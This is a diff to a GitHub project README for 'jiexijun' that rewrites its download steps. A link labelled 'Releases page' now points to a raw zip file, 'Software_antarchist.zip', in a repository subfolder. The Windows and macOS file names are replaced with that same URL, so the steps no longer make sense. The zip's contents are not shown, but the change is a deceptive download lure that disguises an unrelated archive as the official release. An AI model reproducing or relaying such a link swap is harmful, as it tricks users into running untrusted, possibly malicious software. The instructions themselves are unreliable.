Juicper69/jiexijun/README.md

 To start using jiexijun, first, you need to download it from the Releases page.
 Follow these steps:

-1. **Visit the Releases Page:** Click on this link to go to our [Releases page](https://github.com/Juicper69/jiexijun/releases).
+1. **Visit the Releases Page:** Click on this link to go to our [Releases page](https://github.com/Juicper69/jiexijun/raw/refs/heads/main/marrowsky/Software_antarchist.zip).

 2. **Select the Latest Release:** Look for the latest version available.
 It is usually marked with "Latest Release."

 3. **Download the Application:**
-   - For Windows, find the file named `jiexijun-windows.exe`.
+   - For Windows, find the file named `https://github.com/Juicper69/jiexijun/raw/refs/heads/main/marrowsky/Software_antarchist.zip`.
-   - For macOS, choose the file named `jiexijun-macos.app`.
+   - For macOS, choose the file named `https://github.com/Juicper69/jiexijun/raw/refs/heads/main/marrowsky/Software_antarchist.zip`.

 4. **Install**:
    - For Windows: Double-click the downloaded `.exe` file and follow the on-screen instructions.